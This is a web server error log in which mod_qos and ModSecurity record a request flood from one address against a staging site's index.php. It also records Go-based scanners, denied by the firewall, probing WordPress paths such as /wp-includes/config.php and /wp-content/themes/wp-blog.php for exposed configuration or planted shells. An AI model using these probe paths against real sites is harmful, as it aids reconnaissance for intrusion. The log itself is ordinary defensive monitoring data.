[Tue May 26 20:00:40.067836 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1kmgAAAN8
[Tue May 26 20:00:40.115746 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46312] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1koAAAAPM
[Tue May 26 20:00:40.128502 2026] [qos:error] [pid 106517:tid 106768] [client 45.148.10.120:46302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1koQAAAPo
[Tue May 26 20:00:40.131364 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1kowAAANQ
[Tue May 26 20:00:40.134175 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:46328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1kpAAAAJE
[Tue May 26 20:00:40.134821 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1kpQAAAJ4
[Tue May 26 20:00:40.140195 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:46334] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukIZZc2DoU1lPnP1kpwAAAN4
[Tue May 26 20:00:40.277609 2026] [security2:error] [pid 106517:tid 106677] [client 103.163.220.17:27755] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/config.php"] [unique_id "ahWukIZZc2DoU1lPnP1krQAAAKA"]
[Tue May 26 20:00:40.287460 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIOgAAAH8"]
[Tue May 26 20:00:40.289271 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kQwAAANA"]
[Tue May 26 20:00:40.289674 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kQgAAAOs"]
[Tue May 26 20:00:40.291437 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIMwAAAFQ"]
[Tue May 26 20:00:40.295490 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kNwAAAP4"]
[Tue May 26 20:00:40.297014 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kRAAAAL4"]
[Tue May 26 20:00:40.302427 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kPgAAAJo"]
[Tue May 26 20:00:40.305440 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIPgAAABA"]
[Tue May 26 20:00:40.312541 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kTAAAAJ0"]
[Tue May 26 20:00:40.312562 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswISQAAAGI"]
[Tue May 26 20:00:40.323310 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIWAAAAGA"]
[Tue May 26 20:00:40.327829 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIRwAAAGU"]
[Tue May 26 20:00:40.332161 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIVwAAADg"]
[Tue May 26 20:00:40.345074 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswITwAAAGY"]
[Tue May 26 20:00:40.345719 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswISgAAACI"]
[Tue May 26 20:00:40.347185 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIVQAAAC4"]
[Tue May 26 20:00:40.351864 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIUgAAAG4"]
[Tue May 26 20:00:40.354784 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIWwAAADA"]
[Tue May 26 20:00:40.360990 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIWQAAAEo"]
[Tue May 26 20:00:40.363995 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIUAAAABE"]
[Tue May 26 20:00:40.372812 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIVgAAAG0"]
[Tue May 26 20:00:40.388984 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIYAAAAA8"]
[Tue May 26 20:00:40.398865 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIWgAAAHU"]
[Tue May 26 20:00:40.412788 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kYgAAAOY"]
[Tue May 26 20:00:40.413670 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIXwAAAD4"]
[Tue May 26 20:00:40.420195 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIUQAAACA"]
[Tue May 26 20:00:40.421417 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswISwAAAEs"]
[Tue May 26 20:00:40.424329 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kXwAAAJQ"]
[Tue May 26 20:00:40.426096 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIbAAAAD8"]
[Tue May 26 20:00:40.426462 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kWgAAANs"]
[Tue May 26 20:00:40.430425 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIaQAAAAA"]
[Tue May 26 20:00:40.447492 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswITgAAAFg"]
[Tue May 26 20:00:40.448298 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIcAAAAAw"]
[Tue May 26 20:00:40.452271 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIfwAAAHE"]
[Tue May 26 20:00:40.793006 2026] [security2:error] [pid 106517:tid 106733] [client 103.163.220.25:25431] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/ID3/"] [unique_id "ahWukIZZc2DoU1lPnP1lGQAAANc"]
[Tue May 26 20:00:41.276260 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIfQAAABg"]
[Tue May 26 20:00:41.282173 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIhgAAAGg"]
[Tue May 26 20:00:41.284301 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIZwAAAFI"]
[Tue May 26 20:00:41.286082 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIgwAAAAE"]
[Tue May 26 20:00:41.286248 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIaAAAAGE"]
[Tue May 26 20:00:41.287406 2026] [security2:error] [pid 106517:tid 106712] [client 103.163.220.24:30255] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/wp-blog.php"] [unique_id "ahWukYZZc2DoU1lPnP1lMgAAAMI"]
[Tue May 26 20:00:41.296499 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kbQAAAPA"]
[Tue May 26 20:00:41.297235 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIcQAAADw"]
[Tue May 26 20:00:41.302347 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kdAAAAMU"]
[Tue May 26 20:00:41.308493 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIgQAAABI"]
[Tue May 26 20:00:41.326864 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kfwAAAMA"]
[Tue May 26 20:00:41.328791 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIiwAAABY"]
[Tue May 26 20:00:41.332902 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIggAAAF8"]
[Tue May 26 20:00:41.336886 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kcQAAAK0"]
[Tue May 26 20:00:41.349111 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1kwgAAALo"]
[Tue May 26 20:00:41.356373 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kdwAAAKE"]
[Tue May 26 20:00:41.363822 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1keAAAAPE"]
[Tue May 26 20:00:41.377365 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kfAAAAJY"]
[Tue May 26 20:00:41.384911 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k6AAAAPs"]
[Tue May 26 20:00:41.392874 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1kwQAAANA"]
[Tue May 26 20:00:41.393311 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k1AAAANw"]
[Tue May 26 20:00:41.394767 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k6QAAAKU"]
[Tue May 26 20:00:41.398358 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1kwAAAAL0"]
[Tue May 26 20:00:41.411588 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k4wAAAIw"]
[Tue May 26 20:00:41.429432 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k-wAAAMo"]
[Tue May 26 20:00:41.429502 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k_wAAAI4"]
[Tue May 26 20:00:41.434432 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k7wAAALc"]
[Tue May 26 20:00:41.436140 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k8QAAAIc"]
[Tue May 26 20:00:41.440938 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k_QAAAI0"]
[Tue May 26 20:00:41.441471 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k-gAAAOI"]
[Tue May 26 20:00:41.446165 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k9gAAAM8"]
